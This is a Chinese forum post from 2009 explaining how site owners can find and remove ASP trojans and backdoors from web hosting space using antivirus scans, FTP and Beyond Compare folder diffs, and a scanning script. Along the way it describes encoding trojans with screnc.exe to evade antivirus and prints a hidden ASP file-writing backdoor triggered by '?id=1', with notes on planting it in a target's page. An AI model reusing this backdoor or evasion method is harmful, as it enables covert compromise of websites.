下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2409|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
    : s  U! H, m) W. v6 X4 W
    ; M2 Q$ L- g2 P# g7 Z通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
    : Y1 ^0 p9 [3 z: S; I0 \& z& K) ?" G; V% P
    一.技巧1:杀毒软件查杀 2 J9 W+ ]. y9 r& O

    / U- ~1 J/ R4 J% C一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
    3 j8 v) C4 Y  q
    " q$ @- i) ^/ F& c& s3 [利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
    6 b% r7 \' `' j* i: s% t9 k7 \
    ! X3 K0 M) ^0 K二.技巧2:FTP客户端对比
    % u9 V+ f7 Y# o! M6 I; \1 I
    2 I; w1 F# j! A$ A. i& ^上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
    , ~# N9 Q2 A5 [6 W
    + j6 [; {' g: J3 p. b$ q6 yscrenc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
    - {7 j2 G. ~. j4 `3 C5 F6 u) Z4 i* D) X8 d7 `
    经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
    $ U9 Y( p: E- I2 d8 D
    : Q( y0 J  m+ X, y; a  [5 C2 g" b7 a等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
    ! ?1 a  u+ o, p4 ]% ]4 i' f7 k! m6 d; O2 s4 @* |0 O4 `9 Z
    盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
    ! L1 N4 ~7 N% u/ G& L. y( G: F+ T' W" C( O* q5 }
    所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
    $ g3 q% e9 g/ o" c
    ; e. V( }6 T% L# O, U0 Y9 P6 q- @# S这里以FlashFXP进行操作讲解。
    * U+ x6 i# {& K. j* t# r- x0 m8 G; [& W* Q( t
    步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
    7 _& p, A' {. C* t9 x: I8 J( z" X3 @& Y1 |* p9 }2 X
    步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 % u. ^2 W( y# N' S5 U

    4 w3 i: ~( h9 T: S' L% x* f我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
    - e5 }" s: _( [1 O1 U三.技巧3:用Beyond Compare 2进行对比 & y' t2 f' o$ N. T/ V- }& [; d9 N

    6 K* u+ ?6 J; a( g; e" v3 S上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: & W7 Q! ~0 ~! W" Q

    9 z- l/ k6 B6 |8 Y2 ~: [; r+ ?: q1 _〈% ( w2 h9 Y) p4 o: z$ }, R

    $ P3 O1 g2 W' b/ \" j: K8 E' k+ z1 son error resume next , O* V4 a& _/ \+ h

    % ]7 w2 `3 X% s' B/ Zid=request("id")
    8 ^. I6 M: Y6 M6 S: E5 _
    2 j& r- X: M& i* }if request("id")=1 then
    7 }. [; K. U+ `! O  P6 O+ i+ t' T8 v; l2 A. Z
    testfile=Request.form("name") " A3 R- P+ j" b- G" f

    * N2 T& P" m3 r: @! wmsg=Request.form("message") - S: G5 d) [' R) z$ D# M. `

    $ M" b/ p% U; ]3 Gset fs=server.CreatObject("scripting.filesystemobject") ) g1 ]7 Y( f3 e) d0 i0 V
    & Z0 f, X  T8 R
    set thisfile=fs.openTestFile(testfile,8,True,0) ) a/ ~# t4 ~& Z
    & d- G2 s% l: k1 _* u3 A" b
    thisfile.Writeline(""&msg&"") , N7 j! l% |$ d% Y' `7 L) G

    : ~6 ^# A# r0 m- Hthisfile.close , \; I& n! z& B& r1 v

    % Q& c6 }8 T4 b) sset fs=nothing
      P8 ^) U- r0 U7 b0 `4 y' [0 W, M) R, W3 V
    %〉
    ( k% I) y( e: t( X& x: Y) n
    , `! \8 [% w' |( p' f〈from method="post" Action="保存"?id=1〉
    8 l- W0 b, c6 }* d
    4 V# a( A' `# ~' `〈input type="text" size="20" name="Name" 8 b% z) y; I$ ]  s( k7 f7 s; N

    0 Z; b0 _, g# p: [: C, pValue=〈%=server.mappath("XP.ASP")%〉〉 $ E7 k9 x; S* ^% t* [
    ' o7 {' A6 P$ `. V6 W2 c
    〈textarea name="Message" class=input〉 . N# R; j7 C$ S; R: [3 H' @
    # f& x$ |$ f1 s) N1 ?

      Q! k3 N/ b; m6 W* J$ Z7 K〈/textarea〉
    * b# u% P9 p, X+ @" Q2 x/ ]
    3 y7 c5 Q# C% c7 S〈input type="Submit" name="send" Value="生成"
    ' X  M4 o' B2 C% m( ^3 d/ `' z/ P! L
    class=input〉
    ! n' T3 {  S8 w7 g" M7 C. V, D: \% u
    〈/from〉 & J+ P( G+ j! W0 v7 y
    5 o' {3 u# f! L+ s5 K. [9 D
    〈%end if%〉
    ( a/ g0 y& K  ]% e+ l& `6 O$ E  x0 g
    注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
    & j  u- |  W% s8 a) x. X- `9 u; G- ]4 u5 b8 G" _# f" ?
    假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。   z' i/ T2 S& t

    $ n4 C* x  J; R+ }+ B+ l' A8 P! `这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
    7 }9 ]% Y! ~( E3 E6 w# i3 @9 j: T* F' ?, v' _( L
    Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
    + L! K5 ~4 P& r! O) ]

    . ^4 Y/ |8 O5 Q6 i" s; p( U8 p( c+ S看我来利用它完成渗透性asp木马的查找。 ' Z1 _9 Q1 }6 {

      j# |# k9 u6 N! I3 R- F步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
    7 e! D: r8 n+ K; {+ U3 F' m) b6 z5 D6 n' g$ L$ F  P( ~* u; ~0 H
    步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 3 G7 Z& D6 y% E* h" g: X0 N. H
    / ^( n' P2 [9 K; T" Q% o6 z9 L1 A
    步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! 6 z, u2 ^5 z4 x3 z4 X: O# B

    - Q/ O' _6 N" |0 O" N, O
    7 O1 q. s# M. g  ]四.技巧4:利用组件性能找asp木马 . D2 Z# C  b; w2 s' m

    2 O) E! E9 U* e7 u; z. o" g上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
    . p% T4 E7 O) F# @* |$ Y$ ^0 k. ]3 Q" N# _
    如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
    0 L0 O  Z; j" U0 U6 ?  [" E- g
    1 k, }0 d6 t, ^$ _8 F它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。
    : R$ U7 J8 o+ [2 e. p
    ; ]( w( A% Q8 L; [* L使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 ) F) r4 u- m9 C) u  H

    4 a# m, d2 V. r$ \4 d  L一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 3 q9 F+ d4 u; i& z" g0 p

    % H; `: h2 v5 k5 q+ |( S0 R+ ]  ^大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表